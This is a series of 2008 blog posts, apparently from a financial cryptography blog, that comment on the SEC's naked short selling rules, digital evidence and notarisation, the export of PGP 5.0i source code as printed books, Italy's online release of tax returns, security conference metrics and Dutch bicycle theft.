    Late in 1797 Matthew Boulton finally managed to land his long-hoped-for regal coining contract, a story told in chapter five, “The Boulton Copper.” Once Boulton gained his contract, other private coiners withdrew from the business, fearing that the government was now likely to suppress their coins. Although the official copper coins Boulton produced were better than the old regal copper coinage had been, and were produced in large numbers, in many respects they proved less effective at addressing the coin shortage than commercial coins had been.

    Eventually Boulton took part in the reform of the Royal Mint, equipping a brand new mint building with his steam-powered coining equipment. By doing so, Boulton unwittingly contributed to his own mint’s demise, because contrary to his expectations the government reneged on its promise to let him go on supplying British copper coin.

    Then, policy was a charade and promises were not to be believed. Are we any better off now?

    Posted by iang at 06:37 AM | Comments (4) | TrackBack

    July 20, 2008

    SEC bans illegal activity then permits it...

    Whoops:

    SEC Spares Market Makers From `Naked-Short' Sales Ban

    July 18 (Bloomberg) -- The U.S. Securities and Exchange Commission exempted market makers in stocks from the emergency rule aimed at preventing manipulation in shares of Fannie Mae, Freddie Mac and 17 Wall Street firms.

    The SEC granted relief for equity and option traders responsible for pairing off orders from a rule that seeks to bar the use of abusive tactics when betting on a drop in share prices. Exchange officials said limits on ``naked-short'' sales would inhibit the flow of transactions and raise costs for investors.

    ``The purpose of this accommodation is to permit market makers to facilitate customer orders in a fast-moving market,'' the SEC said in the amendment.

    A reader writes: "that lasted what, 12 hours ?" I don't know, but it certainly clashes with the dramatic news of earlier in the week from the SEC, as the Economist reports:

    Desperate to prevent more collapses, the main stockmarket regulator has slapped a ban for up to one month on “naked shorting” of the shares of 17 investment banks, and of Fannie Mae and Freddie Mac, the two mortgage giants. Some argue that such trades, in which investors sell shares they do not yet possess, make it easier to manipulate prices. The SEC has also reportedly issued over 50 subpoenas to banks and hedge funds as part of its investigation into possibly abusive trading of shares of Bear Stearns and Lehman Brothers.

    Naked selling is technically illegal but unenforceable. The fact that it is illegal is a natural extension of contract laws: you can't sell something you haven't got; the reason it is technically easy is that the markets work on delayed settlement. That is, all orders to sell are technically short sales, as all sales are agreed before you turn up with the shares,. Hence, all orders are based on trust, and if your broker trusts you then you can do it, and do it for as long as your broker trusts you.

    "Short selling" as manipulation, as opposed to all selling, works like this: imagine I'm a trusted big player. I get together with a bunch of mates, and agree, next Wednesday, we'll drive the market in Microsoft down. We conspire to each put in a random order for selling large lumps of shares in the morning, followed by lots of buy orders in the afternoon. As long as we buy in the afternoon what we sold in the morning, we're fine.

    On the morning of the nefarious deed, buyers at the top price are absorbed, then the next lower price, then the next ... and so the price trickles lower. Because we are big, our combined sell orders send signals through the market to say "sell, sell, sell" and others follow suit. Then, at the pre-arranged time, we start buying. By now however the price has moved down. So we sold at a high price and bought back at a lower price. We buy until we've collected the same number we sold in the morning, and hence our end-of-day settlement is zero. Profit is ours, crack open the gin!

    This trick works because (a) we are big enough to buy/sell large lumps of shares, and (b) settlement is delayed as long as we can convince the brokers, so (c) we don't actually need the shares, just the broker's trust. Generally on a good day, no more than 1% of a company's shares move, so we need something of that size. I'd need to be very big to do that with the biggest fish, but obviously there are some sharks around:

    The S&P500 companies with the biggest rises in short positions relative to their free floats in recent weeks include Sears, a retailer, and General Motors, a carmaker.

    Those driven by morality and striven with angst will be quick to spot that (a) this is only available to *some* customers, (b) is therefore discriminatory, (c) that it is pure and simple manipulation, and (d) something must be done!

    Noting that service of short-selling only works when the insiders let outsiders play that game, the simple-minded will propose that banning the insiders from letting it happen will do the trick nicely. But, this is easier said than done: selling without shares is how the system works, at its core, so letting the insiders do it is essential. From there, it is no distance at all to see that insiders providing short sales as a service to clients is ... not controllable, because fundamentally all activities are provided to a client some time, some way. Any rule will be bypassed *and* it will be bypassed for those clients who can pay more. In the end, any rule probably makes the situation worse than better, because it embeds the discrimination in favour of the big sharks, in contrast to ones regulatory aim of slapping them down.

    Rules making things worse could well be the stable situation in the USA, and possibly other countries. The root of the problem with the USA is historical: Congress makes the laws, and made most of the foundational laws for stock trading in the aftermath of the crash of 1929. Then, during the Great Depression, Congress didn't have much of a clue as to why the panic happened, and indeed nobody else knew much of what was going on either, but they thought that the SEC should be created to make sure it didn't happen again.

    Later on, many economists established their fame in studying the Great Depression (for example, Keynes and Friedman). However, whether any parliament in the world can absorb that wisdom remains questionable: Why should they? Lawmakers are generally lawyers,and are neither traders nor economists, so they rely on expert testimony. And, there is no shortage of experts to tell the select committees how to preserve the benefits of the markets for their people.

    Which puts the lie to a claim I made repeatedly over the last week: haven't we figured out how to do safe and secure financial markets by now? Some of us have, but the problem with making laws relying on that wisdom is that the lawmakers have to sort out those who profit by it from those who know how to make it safe. That's practically impossible when the self-interested trader can outspend the economist or the financial cryptographer 1000 to 1.

    And, exactly the same logic leads to the wide-spread observation that the regulators are eventually subverted to act on behalf of the largest and richest players:

    The SEC’s moves deserve scrutiny. Investment banks must have a dizzying influence over the regulator to win special protection from short-selling, particularly as they act as prime brokers for almost all short-sellers...

    The SEC’s initiatives are asymmetric. It has not investigated whether bullish investors and executives talked bank share prices up in the good times. Application is also inconsistent. ... Like the Treasury and the Federal Reserve, the SEC is improvising in order to try to protect banks. But when the dust settles, the incoherence of taking a wild swing may become clear for all to see.

    When the sheepdog is owned by the wolves, the shepherd will soon be out of business. Unlike the market for sheep, the shareholder cannot pick up his trusty rifle to equalise the odds. Instead, he is offered a bewildering array of new sheepdogs, each of which appear to surprise the wolves for a day or so with new fashionable colours, sizes and gaits. As long as the shareholder does not seek a seat at the table, does not assert primacy over the canines, and does not defend property rights over the rustlers from the next valley, he is no more than tomorrow's mutton, reared today.

    Posted by iang at 08:01 PM | Comments (2) | TrackBack

    July 06, 2008

    Digital Evidence: Musing on the rocky path to wisdom

    I've notched up two events in London: the International Conference on Digital Evidence 10 days ago, and yesterday I attended BarCampBankLondon. I have to say, they were great events!

    Another great conference in our space was the original FC in 1997 in Anguilla. This was a landmark in our field because it successfully brought together many disciplines who could each contribute their specialty. Law, software, cryptography, managerial, venture, economics, banking, etc. I had the distinct pleasure of a professor in law gently chiding me that I was unaware of an entire school of economics known as transaction economics that deeply affected my presentation. You just can't get that at the regular homogeneous conference, and while I notice that a couple of other conferences are laying claim to dual-discipline audiences, that's not the same thing as Caribbean polyglotism.

    Digital Evidence was as excellent as that first FC97, and could defend a top rating in conferences in the financial cryptography space. It had some of interactivity, perhaps for two factors: it successfully escaped the trap or fixation on local jurisdiction, and it had a fair smattering of technical people who could bring the practical perspective to the table.

    Although I'd like to blog more about the presentations, it is unlikely that I can travel that long journey; I've probably enough material for a month, and no month to do it in. Which highlights a continuing theme here at on this blog: there is clearly a hole in the knowledge-to-wisdom market. It is now even an archaic cliche that we have too much data, too much information to deal with, so how do we make the step up through knowledge and on to wisdom?

    Conferences can help; but I feel it is far too easy to fall into the standard conference models. Top quality names aimed at top paying attendees, blindness by presumptions about audience and presenters (e.g., academic or corporate), these are always familiar complaints.

    Another complaint is that so much of the value of conferences happens when the "present" button is set to "off". And that leads to a sort of obvious conclusion, in that the attendees don't so much want to hear about your discoveries, rather, what they really want is to develop solutions to their own problems. FC solved this in a novel way by having the conference in the Caribbean and other tourist/financial settings. This lucky choice of a pleasant holiday environment, and the custom of morning papers leaving afternoons freer made for a lot of lively discussion.

    There are other models. I experimented at EFCE, which Rachel, Fearghas and I ran a few years back in Edinburgh. My call (and I had to defend my corner on this one) was that the real attendees were the presenters. If you could present to peers who would later on present to you, then we could also more easily turn off the button and start swapping notes. If we could make an entire workshop of peers, then structure would not be imposed, and relationships could potentially form naturally and evolve without so many prejudices.

    Which brings us to yesterday's event: BarCampBankLondon. What makes this bash unusual is that it is a meeting of peers (like EFCE), there is a cross-discipline focus (finance and computing, balanced with some legal and consulting people) and there isn't much of an agenda or a selection process (unlike EFCE). Addendum: James Gardner suggests that other conferences are dead, in the face of BarCamp's model.

    I'm all for experimentation, and BCBL seemed to manage the leading and focussing issue with only the lightest of touches. What is perhaps even more indicative of the (this?) process was that it was only 10 quid to get in, but you consume your Saturday on un-paid time. Which is a great discriminator: those who will sacrifice to work this issue turned up, and those looking for easy, paid way to skive off work did not.

    So, perhaps an ideal format would be a BarCamp coupled with the routine presentations? Instead of a panel session (which I find a bit fruitless) replace one afternoon with a free-for-all? This is also quite similar to the "rump sessions" that are favoured in the cryptography world. Something to think about when you are running your next conference.

    Posted by iang at 05:54 PM | Comments (2) | TrackBack

    June 30, 2008

    Cross-border Notarisations and Digital Signatures

    My notes of a presentation by Dr Ugo Bechini at the Int. Conf. on Digital Evidence, London. As it touches on many chords, I've typed it up for the blog:

    The European or Civil Law Notary is a powerful agent in commerce in the civil law countries, providing a trusted control of a high value transaction. Often, this check is in the form of an Apostille which is (loosely) a stamp by the Notary on an official document that asserts that the document is indeed official. Although it sounds simple, and similar to common law Notaries Public, behind the simple signature is a weighty process that may be used for real estate, wills, etc.

    It works, and as Eliana Morandi puts it, writing in the 2007 edition of the Digital Evidence and Electronic Signature Law Review:

    Clear evidence of these risks can be seen in the very rapid escalation, in common law countries, of criminal phenomena that are almost unheard of in civil law countries, at least in the sectors where notaries are involved. The phenomena related to mortgage fraud is particularly important, which the Mortgage Bankers Association estimates to have caused the American system losses of 2.5 trillion dollars in 2005.

    OK, so that latter number came from Choicepoint's "research" (referenced somewhere here) but we can probably agree that the grains of truth sum to many billions.

    Back to the Notaries. The task that they see ahead of them is to digitise the Apostille, which to some simplification is seen as a small text with a (dig)sig, which they have tried and tested. One lament common in all European tech adventures is that the Notaries, split along national lines, use many different systems: 7 formats indicating at at least 7 softwares, frequent upgrades, and of course, ultimately, incompatibility across the Eurozone.

    To make notary documents interchangeable, there are (posits Dr Bechini) two solutions:

    1. a single homogenous solution for digsigs; he calls this the "GSM" solution, whereas I thought of it as a potential new "directive failure".
    2. a translation platform; one-stop shop for all formats

    A commercial alternative was notably absent. Either way, IVTF (or CNUE) has adopted and built the second solution: a website where documents can be uploaded and checked for digsigs; the system checks the signature, the certificate and the authority and translates the results into 4 metrics:

    • Signed - whether the digsig is mathematically sound
    • Unrevoked - whether the certificate has been reported compromised
    • Unexpired - whether the certificate is out of date
    • Is a notary - the signer is part of a recognised network of TTPs

    In the IVTF circle, a notary can take full responsibility for a document from another notary when there are 4 green boxes above, meaning that all 4 things check out.

    This seems to be working: Notaries are now big users of digsigs, 3 million this year. This is balanced by some downsides: although they cover 4 countries (Deustchland, España, France, Italy), every additional country creates additional complexity.

    Question is (and I asked), what happens when the expired or revoked certificate causes a yellow or red warning?

    The answer was surprising: the certificates are replaced 6 months before expiry, and the messages themselves are sent on the basis of a few hours. So, instead of the document being archived with digsig and then shared, a relying Notary goes back to the originating Notary to request a new copy. The originating Notary goes to his national repository, picks up his *original* which was registered when the document was created, adds a fresh new digsig, and forwards it. The relying notary checks the fresh signature and moves on to her other tasks.

    You can probably see where we are going here. This isn't digital signing of documents, as it was envisaged by the champions of same, it is more like real-time authentication. On the other hand, it does speak to that hypothesis of secure protocol design that suggests you have to get into the soul of your application: Notaries already have a secure way to archive the documents, what they need is a secure way to transmit that confidence on request, to another Notary. There is no problem with short term throw-away signatures, and once we get used to the idea, we can see that it works.

    One closing thought I had was the sensitivity of the national registry. I started this post by commenting on the powerful position that notaries hold in European commerce, the presenter closed by saying "and we want to maintain that position." It doesn't require a PhD to spot the disintermediation problem here, so it will be interesting to see how far this goes.

    A second closing thought is that Morandi cites

    ... the work of economist Hernando de Soto, who has pointed out that a major obstacle to growth in many developing countries is the absence of efficient financial markets that allow people to transform property, first and foremost real estate, into financial capital. The problem, according to de Soto, lies not in the inadequacy of resources (which de Soto estimates at approximately 9.34 trillion dollars) but rather in the absence of a formal, public system for registering property rights that are guaranteed by the state in some way, and which allows owners to use property as collateral to obtain access to the financial captal associated with ownership.

    But, Latin America, where de Soto did much of his work, follows the Civil Notary system! There is an unanswered question here. It didn't work for them, so either the European Notaries are wrong about their assertation that this is the reason for no fraud in this area, or de Soto is wrong about his assertation as above. Or?

    Posted by iang at 08:02 AM | Comments (1) | TrackBack

    June 17, 2008

    Digital Evidence -- 26-27 June, London

    Cryptographers, software and hardware architects and others in the tech world have developed a strong belief that everything can be solved with more bits and bites. Often to our benefit, but sometimes to our cost. Just so with matters of law and disputes, where inventions like digital signatures have laid a trail of havoc and confusion through security practices and tools. As we know in financial cryptography, public-key reverse encryptions -- confusingly labelled as digital signatures -- are more usefully examined within the context of the law of evidence than within that of signatures.

    Now here cometh those who have to take these legal theories from the back of the technologists' napkins and make them really work: the lawyers. Stephen Mason leads an impressive line-up from many countries in a conference on Digital Evidence:

    Digital evidence is ubiquitous, and to such an extent, that it is used in courts every day in criminal, family, maritime, banking, contract, planning and a range of other legal matters. It will not be long before the only evidence before most courts across the globe will all be in the form of digital evidence: photographs taken from mobile telephones, e-mails from Blackberries and laptops, and videos showing criminal behaviour on You Tube are just some of the examples. Now is the time for judges, lawyers and in-house counsel to understand (i) that they need to know some of the issues and (ii) they cannot ignore digital evidence, because the courts deal with it every day, and the amount will increase as time goes by. The aim of the conference will be to alert judges, lawyers (in-house lawyers as well as lawyers in practice), digital forensic specialists, police officers and IT directors responsible for conducting investigations to the issues that surround digital evidence.

    Not digital signatures, but evidence! This is a genuinely welcome development, and well worth the visit. Here's more of the blurb:

    Conference Programme International Conference on Digital Evidence

    26th- 27th June 2008, The Vintner's Hall, London – UNITED KINGDOM
    Conference: 26th & 27th June 2008, Vintners' Hall, London
    Cocktail & Dinner: 26th June 2008, The Honourable Society of Gray's Inn

    THE FIRST CONFERENCE TO TREAT DIGITAL EVIDENCE FULLY ON AN INTERNATIONAL PLATFORM...

    12 CPD HOURS - ACCREDITED BY THE LAW SOCIETY & THE BAR STANDARDS BOARD
    This event has also been accredited on an ad hoc basis under the Faculty's CPD Scheme and will qualify for 12 hours

    Understanding the Technology: Best Practice & Principles for Judges, Lawyers, Litigants, the Accused & Information Security & Digital Evidence Specialists

    MIS is hosting & developing this event in partnership with & under the guidance of Stephen Mason, Barrister & Visiting Research Fellow, Digital Evidence Research, British Institute of International and Comparative Law.
    Mr. Mason is in charge of the programme's content and is the author of Electronic Signatures in Law (Tottel, 2nd edn, 2007) [This text covers 98 jurisdictions including case law from Argentina, Australia, Brazil, Canada, China, Colombia, Czech Republic, Denmark, Dominican Republic, England & Wales, Estonia, Finland, France, Germany, Greece, Hungary, Israel, Italy, Lithuania, Netherlands, Papua New Guinea, Poland, Portugal, Singapore, South Africa, Spain, Switzerland and the United States of America]. He is also an author and general editor of Electronic Evidence: Disclosure, Discovery & Admissibility (LexisNexis Butterworths, 2007) [This text covers the following jurisdictions: Australia, Canada, England & Wales, Hong Kong, India, Ireland, New Zealand, Scotland, Singapore, South Africa and the United States of America]. Register Now!

    Stephen is also International Electronic Evidence, general editor, (British Institute of International and Comparative Law, 2008), ISBN 978-1-905221-29-5, covering the following jurisdictions: Argentina, Austria, Belgium, Bulgaria, Croatia, Cyprus, Czech Republic, Denmark, Egypt, Estonia, Finland, France, Germany, Greece, Hungary, Iceland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Mexico, Netherlands, Norway, Poland, Romania, Russia, Slovakia, Slovenia, Spain, Sweden, Switzerland, Thailand and Turkey.

    Posted by iang at 09:46 AM | Comments (2) | TrackBack

    Historical copy of PGP 5.0i for sale -- reminder of the war we lost

    Back in the 1990s, a group called the cypherpunks waged the crypto wars with the US government. They wanted easy access to crypto, the US government didn't want them to have it. RAH points to Sameer's blog:

    The solution for my company, C2Net Software, Inc., was to develop an offshore development team and have them develop the software there. Other companies developed different strategies. Most opted to sell broken products to their overseas customers. One other company cared about the security of their customers. That company was PGP.

    PGP chose a different strategy however. They published their source code as a book. The book was then exported, the contents of that book were then scanned in, and then a completely legal international version of PGP was born.

    Sameer is selling his copy of PGP 5.0i, the book that was printed in the USA and exported in boxes to the international scanning project.

    PGP 5.0i, on the other hand, was compiled from source code that was printed in a book (well, actually 12 books - over 6000 pages!). The books were exported from the USA in accordance with the US Export Regulations, and the pages were then scanned and OCRed to make the source available in electronic form.

    This was not an easy task. More than 70 people from all over Europe worked for over 1000 hours to make the PGP 5.0i release possible. But it was worth it. PGP 5.0i was the first PGP version that is 100% legal to use outside the USA, because no source code was exported in electronic form.


    The last 1% was done at HIP 1997, or hacking-in-progress, a Dutch open-air festival conducted once every 4 years. (You can see an early attempt at blogging here and here and a 2004 post.)

    Lucky Green turned up with a box and ... left it lying around, at which point the blogging stopped and the work started. A team of non-Americans then spent around 2 days working through the last, unscanned and broken pages. There were about 20 at the peak, working in teams of 2 and 3 across all of HIP, swapping their completed files back at the cypherpunks tent. Somewhere around is a photo of the last file being worked through, with three well-known hackers on one keyboard.

    It was uploaded around 3 in the morning, Sunday if I recall, as the party was winding down; some brave souls waited around for the confirmed download, but by 5am, only Sameer was still up and willing to download and compile a first international PGP 5.0.

    The story has a sad ending. In the last months of 1999, the US government released the controls on exporting free and open cryptography. Hailed by all as a defeat, it was really a tactical withdrawal from ground that wasn't sustainable. The cypherpunks lost more: with the departure of their clear enemy, they dispersed over time, and emerging security and financial cryptography entrepreneurs lost our coolness factor and ready supply of cryptoplumbers. Lots of crypto projects migrated back to the US, where control was found by other means. The industry drifted back to insecure-practice-by-fiat. Buyers stopped being aware of security, and they were setup for the next failure and the next and the next...

    Strategic victory went to the US government, which still maintains a policy of keeping the Internet insecure by suppressing crypto where and when it can. Something to remember if you ever get offered a nice public relations job in the DHS, or if you ever get phished.

    Posted by iang at 03:39 AM | Comments (6) | TrackBack

    May 10, 2008

    The Italian Job: highlights the gap between indirect and direct damage

    If you've been following the story of the Internet and Information Security, by now you will have worked out that there are two common classes of damage that are done when data is breached: The direct damage to the individual victims and the scandal damage to the organisation victim when the media get hold of it. From the Economist:

    Illustration by Peter Schrank

    ... Italians had learnt, to their varying dismay, amusement and fascination, that—without warning or consultation with the data-protection authority—the tax authorities had put all 38.5m tax returns for 2005 up on the internet. The site was promptly jammed by the volume of hits. Before being blacked out at the insistence of data protectors, vast amounts of data were downloaded, posted to other sites or, as eBay found, burned on to disks.

    The uproar in families and workplaces caused by the revelation of people's incomes (or, rather, declared incomes) can only be guessed at. A society aristocrat, returning from St Tropez, found himself explaining to the media how he financed a gilded lifestyle on earnings of just €32,043 ($47,423). He said he had generous friends.

    ...Vincenzo Visco, who was responsible for stamping out tax dodging, said it promoted “transparency and democracy”. Since the 1970s, tax returns have been sent to town halls where they can be seen by the public (which is how incomes of public figures reach the media). Officials say blandly that they were merely following government guidelines to encourage the use of the internet as a means of communication.

    The data-protection authority disagreed. On May 6th it ruled that releasing tax returns into cyberspace was “illicit”, and qualitatively different from making them available in paper form. It could lead to the preparation of lists containing falsified data and meant the information would remain available for longer than the 12 months fixed by law.

    The affair may not end there. A prosecutor is investigating if the law has been broken. And a consumer association is seeking damages. It suggests €520 per taxpayer would be appropriate compensation for the unsolicited exposure.

    An insight of the 'silver bullets' approach to the market is that these damages should be considered separately, not lumped together. The one that is the biggest cost will dominate the solution, and if the two damages suggest opposing solutions, the result may be at the expense of the weaker side.

    What makes Information Security so difficult is that the public scandal part of the damage (the indirect component) is generally the greater damage. Hence, breaches have been classically hushed up, and the direct damages to the consumers are untreated. In this market, then, the driving force is avoiding the scandal, which not only means that direct damage to the consumer is ignored, it is likely made worse.

    We then see more evidence of the (rare) wisdom of breach disclosure laws, even if, in this case, the breach was a disclosure by intention. The legal action mentioned above puts a number on the direct damage to the consumer victim. We may not agree with €520, but it's a number and a starting position that is only possible because the breach is fully out in the open.

    Those then that oppose stronger breach laws, or wish to insert various weasel words such as "you're cool to keep it hush-hush if you encrypted the data with ROT13" should ask themselves this: is it reasonable to reduce the indirect damage of adverse publicity at the expense of making direct damages to the consumer even worse?

    Lots of discussion, etc etc blah blah. My thought is this: we need to get ourselves to a point, as a society, where we do not turn the organisation into more of a secondary victim that it already is through its breach. We need to not make matters worse; we should work to remove the incentives to secrecy, rather than counterbalancing them with opposing and negative incentives such as heavy handed data protection regulators. If there is any vestige of professionalism in the industry, then this is one way to show it: let's close down the paparazzi school of infosec and encourage and reward companies for sharing their breaches in the open.

    Posted by iang at 10:24 AM | Comments (2) | TrackBack

    April 20, 2008

    The Medium is the Message: what is the message of security today?

    Who said that? Was it Andy Warhol or Marshal McLuhan or Maurice Saatchi?

    A few days ago, we reflected on the medium of the RSA conference, and how the message has lost its shine. One question is how to put the shine back on it, but another question is, why do we want shine on the conference? As Ping mused on, what is the message in the first place?

    The medium is the message. Here's an example that I stumbled across today: Neighbours. If you don't know what that is, have a look at wikipedia. Take a few moments to skim through the long entry there ...

    If you didn't know what it was before, do you know now? Wikipedia tells us about the popularity, the participants, the ratings, the revamps, the locations, the history of the success, the theme tune, and the awards. Other than these brief lines at the beginning:

    Neighbours is a long-running Australian soap opera. The series follows the daily lives of several families who live in the six houses at the end of Ramsay Street, a quiet cul-de-sac in the fictional middle-class suburb of Erinsborough. Storylines explore the romances, family problems, domestic squabbles, and other key life events affecting the various residents.

    Wikipedia does not tell the reader what Neighbours is. There are 5998 words in the article, and 55 words in that message above. If we were being academic, we could call them message type I and type II and note that there is a ratio of 100 to 1 between them!

    At a superficial, user-based level, the 55 words above is the important message. To me and you, that is. But, to whoever wrote that article, the other 99% is clearly the most important. Their words are about the medium, not what we outsiders would have called the message, and it is here that the medium has become the message.

    Some of that stuff *is* important. If we drag through the entire article we find that the TV show does one million daily audience in Australia, peaked at 18 million in the UK, and other countries had their times too. That you can take to the bank, advertisers will line up out on the street to buy that.

    We can also accurately measure the cost and therefore benefit to consumers: 30 minutes each working day. So we know, objectively, that this entertainment is worth 30 minutes of prime time for the viewers. (The concept of a soap opera guarantees repeat business, so you know you are also targetting a consistent set of people, consistently.)

    We can then conclude that, on the buy side and the sell side of this product, we have some sort of objective meeting of the minds. And, we can compress this mind meeting into a single number called ratings. Based on that one number alone, we can trade.

    That number, patient reader, is a metric. A metric is something that is objectively important to both buyer and seller. It's Okay that we don't know what "it" is, as long as we have the metric of it. In television, the medium is the message, and that's cool.

    Now, if we turn back to the RSA channel .. er .. conference, we can find similar numbers: In 2007, 17,000 attendees and 340 exhibitors. Which is bankable, you can definitely get funding for that, so that conference is in good shape. On the sell side, all is grand.

    However, as the recent blog thread pointed out, on the buy side, there is a worrying shortage of greatness: the message was, variously, buyers can't understand the products, buyers think the products are crap, buyers don't know why they're there, and buyers aren't buying.

    In short, buyers aren't, anymore. And this separates Neighbours from RSA in a way that is extremely subtle. When I watch an episode of Neighbours, my presence is significant in and of itself because the advertising works on a presence & repeat basis. I'm either entertained and come back tomorrow, or I stop watching, so entertainment is sufficient to make the trade work.

    However, if I go to the RSA conference, the issue of my *presence* isn't the key. Straight advertising isn't the point here, so something other than my presence is needed.

    What is important is that the exhibitors sell something. Marketing cannot count on presence alone because the buyer is not given that opportunity statistically (1 buyer, 340 exhibitors, zero chance of seeing all the adverts) so something else has to serve as the critical measurement of success.

    Recent blog postings suggest it is sales. Whatever it is, we haven't got that measurement. What we do have is exhibitors and participants, but because these numbers fail to have relevance to both sides of the buy-sell divide then these numbers fail to be metrics.

    Which places RSA in a different space to Neighbours. Readers will recognise the frequent theme of security being in the market for silver bullets, and that the numbers of exhibitors and participants are therefore signals, not metrics.

    And, in this space, when the medium becomes the message, that's very uncool, because we are now looking at a number that doesn't speak to sales. When Marshal McLuhan coined his phrase, he was speaking generally positively about electronic media such as TV, but we can interpret this in security more as a warning: In a market based on signals not metrics, when the signals become the system, when the medium becomes the message, it is inevitable that the system will collapse, because it is no longer founded on objective needs.

    Signals do not by definition capture enough of the perfect quality that is needed, they only proxy it in some uncertain and unreliable sense. Which is fine, if we all understand this. To extend Spence's example, if we know that a degree in Computer Science is not a guarantee that the guy can program a computer, that's cool.

    Or, to put it another way: there are no good signals, only less bad ones. The signal is less bad than the alternate, which is nothing. Which leads us to the hypothesis that the market will derail when we act as if the the signal is a metric, as if the Bachelor's in CompSci is a certification of programming skill, as if booth size is the quality of security.

    Have another look at Neighbours. It's still going on after 22 years or so. It is around one million, because of some revamp. That metric is still being taken to to the bank. The viewer is entertained, the advertiser markets. Buyer and seller are comfortable, the message and the medium therefore are in happy coincidence, they can happily live together because the medium lives on solid metrics. All of this, and we still don't know what it is. That's TV.

    Whereas with the world of security, we know that the signal of the RSA conference is as strong as ever, but we also know that, in this very sector that the conference has become the iconic symbol for, the wheels are coming off. And, what's even more disturbing, we know that the RSA conference will go from strength to strength, even as the wheels are spinning out of view, and we the users are sliding closer to the proverbial cliff.

    I know the patient reader is desperate to find out what Neighbours really is, so here goes. Read the following with an Aussie sense of humour:

    About 10 years back I and a partner flew to Prague and then caught a train to a a Czech town near the Polish border, in a then-devastated coal belt. We were to consult to a privatised company that was once the Ministry of Mines. Recalling communist times, the Ministry had shrunk from many hundreds of thousands of miners down to around 20,000 at that time.

    Of which, only 2 people spoke English. These two English speakers, both of them, picked us up at the train station. As we drove off, the girl of the pair started talking to us, and her accent immediately jolted us out of our 24 hours travel stupor: Australian! Which was kind of unexpected in such a remote place, off the beaten track, as they say down under.

    I looked slowly at my friend, who was Scandinavian. He looked at me, slowly. Okay, so there's a story here, we thought... Then, searching for the cautious approach, we tried to figure it out:

    "How long have you lived here?" I asked.

    She looked back at me, with worry in her face. "All ma life. Ah'm Czech." In pure, honest dinkum Strine, if you know what that means.

    "No, you're not, you're Aussie!"

    "I'm Czech! I kid you not!"

    "Okay...." I asked slowly, "then why do you have an Australian accent."

    Nothing, except more worry on her face. "Where did you learn English?"

    This she answered: "London. I did a couple of year's Uni there."

    "But you don't have an English accent. Where did you pick up an Australian accent?"

    "Promise you won't laugh?" We both duly promised her we would not laugh, which was easy, as we were both too tired to find anything funny any more.

    "Well," she went on, "I was s'posed to do English at Uni but I didn't." That is, she did not attend the University's language classes.

    "Instead, I stayed at home and watched Neighbours every lunchtime!"

    Of course, we both cracked up and laughed until she was almost in tears.

    That's what Neighbours is -- a cultural phenomena that swept through Britain by presenting an idyllic image of a sunny, happy place in a country far far away. Lots of fun people, lots of sunshine, lots of colour, lots of simple dramas, albeit all in that funny Aussie drawl. A phenomena strong enough that, in an unfair competition of 22 minutes, squeezed between daily life on the streets of the most cosmopolitan city in the world, it was able to imprint itself on the student visitor, and totally dominate the maturing of her language. The result was perfect English, yet with no trace of the society in which she lived.

    But you won't read that in Wikipedia, because, for the world of TV, the medium is the message, and they have a metric. They only care that she watched, not what it did to her. And, in the converse, the language student got what she wanted, and didn't care what they thought about that.

    Posted by iang at 05:30 PM | Comments (1) | TrackBack

    April 19, 2008

    The illusion of Urban Legends - the Dutch Revolving Bicycle Cycle

    Chandler spots a post by Michael on those pervasively two-wheeled Dutch, who all share one standard beaten-up old bike model, apparently mass-produced in a beaten-up old bike factory.

    The Dutch are also prosperous, and they have a strong engineering and technology culture, so I was surprised on two visits in the last few years to see that their bikes are all junkers: poorly maintained, old, heavy, three-speeds. The word I used was all. ...

    I asked about this and everyone immediately said "if you had a good bike it would be immediately stolen." On reflection, I'm not satisfied with the answer, for a couple of reasons. First, the Dutch are about as law-abiding as Americans, perhaps more. Second, the serious lock that has kept my pretty good bikes secure on sketchy streets in two US cities for decades is available for purchase all over the world.

    Third, and most important, I don't see how this belief could be justified by real data, because there were absolutely no bikes worth stealing anywhere I looked. ...

    Right. So here's an interesting case of an apparently irreconcilable conundrum. Why does all the evidence suggest that bike insecurity is an improbability, yet we all believe it to be pervasive? Let's tear this down, because there are striking parallels between Micheal's topic and the current debate on security. (Disclosure: like half of all good FCers, I've spent some time on Amsterdam wheels, but it is a decade or so back.)

    At least, back then, I can confirm that bicycle theft was an endemic problem. I can't swear to any figures, but I recall this: average lifespan of a new bike was around 3 months (then it becomes someone else's old bike). I do recall frequent discussions about a German friend who lost her bike, stolen, several times, and had to go down to the known areas where she could buy another standard beat-up bike from some shady character. Two or three times per year, and I was even press-ganged into riding shotgun once, so I have some first-hand evidence that she wasn't secretly building a bike out of spare parts she had in her handbag. Back then, the going price was around 25-50 guilders (hazy memory) which would be 10-30 euros. Anyone know the price at the moment?

    For the most part, I used inline skates. However when I did some small job somewhere (for an FC connection), I was faced with the issue. Get a bike, lose it! As a non-native, I lacked the bicycle-loss-anti-angst-gene, so I was emotionally constrained from buying the black rattler. I faced and defeated the demon with a secret weapon, the Brompton!

    The Dutch being law-abiding: well, this is just plain wrong. The Dutch are very up-right, but that doesn't mean they aren't human. Law-abiding is an economic issue, not an absolute. IMO, there is no such thing as a region where everyone abides by the law, there are just regions where they share peculiarities in their attitudes about the law. For tourists, there are stereotypes, but the wise FCer gnaws at the illusion until the darker side of economic reality and humanity is revealed. It's fun, because without getting into the character of the people, you can't design FC systems for them!

    As it turns out, there is even a casual political term for this duality: the Dutch Compromise describes their famous ability to pass a law to appease one group of people, and then ignore it totally to appease another. A rather well-known counterexample: it is technically illegal to trade in drugs and prostitution. E.g., for the latter, you are allowed to display your own wares in your own window. For an example, look around for a concentration of red lights in the window.

    Final trick: when they buy a new bike (as new stock has to be inserted into the population of rotating wheels), the wise Dutch commuter will spend a few hours making it look old and tatty. Disguise is a skill, which may explain the superficial observation that no bicycle is worth stealing.

    What I don't know: why the trade persists. One factor that may explain this is that enough of the Dutch will buy a stolen bike to make it work. I also asked about this, and recall discussions where very up-right, very "law-abiding" citizens did indeed admit to buying stolen wheels. So the mental picture here is of a rental or loaning system, and as a society, they haven't got it together to escape their cyclical prisoner's dilemma.

    Also: are bike locks totally secure? About as secure as crypto, I'd say. Secure when it works, a broken bucket of worthless bits when it doesn't. But let's hear from others?

    Addendum: citybikes are another curiosity. Adam reportst that they are now being tried in the US.

    Posted by iang at 05:59 AM | Comments (5) | TrackBack

    April 17, 2008

    Browser news: Fake subpoenas, the OODA waltz, and baby steps on the client side

    Phishing still works, says Verisign:

